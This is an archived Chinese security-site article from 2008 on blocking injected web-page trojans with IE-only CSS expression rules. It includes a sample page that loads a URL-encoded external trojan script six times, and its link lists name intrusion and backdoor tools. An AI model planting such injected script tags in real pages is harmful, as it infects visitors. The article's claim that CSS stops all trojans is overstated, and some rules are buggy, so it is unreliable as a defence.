·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[推荐]二行代码解决全部网页木马(含iframe/script木马）

荐 ★★★★★

二行代码解决全部网页木马(含iframe/script木马）

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2008-4-13 9:44:41

以下页面代码里含有一个木马地址，而且木马在页面里重复了6次，大家分别用我上面的不同方案测试一下，看看我的研究如何！（此测试有一定的危险性，请务必打好所有补丁再测试）

以下是引用片段：
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>让JS木马的进程迅速中止的CSS代码</title>
<style type="text/css" id="LinrStudio">
/*<![CDATA[*/
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/* 以后请在此关注最新木马处理方法：http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的１
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的２
<script src=http://%76%63%63%64%2E%63%6E></script>
我是页面本身的３
<script src=http://%76%63%63%64%2E%63%6E></script>
</body>
</html>

其中1.js是自己本站的：

以下是引用片段：
document.write("我是本站的JS文件");
document.write("<img src='/Article/UploadFiles/200804/20080413114026405.gif' />");

我的测试环境是：
　　Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好补丁。
综上所述，所有目前的挂马方式全都破解了，用CSS就可以解决所有木马问题，访客不会再轻易地中毒了。

大家也要仔细研究一下，看看我的代码有什么BUG，有的话一定要拿出来讨论，好解决问题！或是各位有其他更好的办法可以拿出来讨论一下。

很晚了，我要睡觉了。有空再研究。

更正第五个方案
上面写到的第五个方案代码写错了，

以下是引用片段：
<script src="***/**.js" id="lhSearchJSapi"></script>
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木马被成功隔离!'):''));}

红色字部分有错误，应该是!=-1,上面的正确写法应该是：

script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==-1)?document.write('木马被成功隔离!'):''));}

script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}

[/code]<script id="tjJSapivok" title="这是你外域的统计流量的JS代码" type="text/javascript" src="http://js.tongji.yahoo.com.cn/1/188/205/ystat.js"></script>
<script id="otherJSapivok" title="这是你本站需要的JS文件" type="text/javascript" src="footer.js"></script>[/code]script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));}

<script id="footerJSapivok" src="这里写你本网站的JS路径" type="text/javascript"></script>
<script id="tongjiJSapivok" src="这里外域的JS路径" type="text/javascript"></script>

你网站的所有JS标记(<script>)都得加上id属性，并且有一个共同的前缀、后缀或公共字符串，上面的公共字符串为“vok”。

　　特此更正，感谢昵称为“网工”的QQ网友提醒。
研究网页挂马破坏用户的斗争还在继续，也不会停止。还望各位将服务器安全性能配置好点，我这也只是临时避避风雨的办法。

上一页 [1] [2]

文章录入：cainiaowang 责任编辑：xinlian

上一篇文章：企业安全之YY内网准入以及划分

下一篇文章： PHP安全配置详解

【字体：小大】

中介交易区

阻止Alert攻击代码	12-14
Arp反欺骗策略	11-29
如何杜绝iframe挂马	11-29
ARP欺骗解决终极办法(传说中的虚	11-06
打造抵御SQL注入攻击的MS SQL服务	10-23
ASP木马Webshell安全解决方案	09-22
ASP登陆验证页应做的安全问题	08-25
防黑主要是日常维护的5个步骤总结	08-25
Windows Server2003安全配置整理	08-20
安全虚拟主机配置	07-18
ASP木马Webshell的安全防范解决办	06-19
CC DDOS攻击器的原理及防范方法	06-13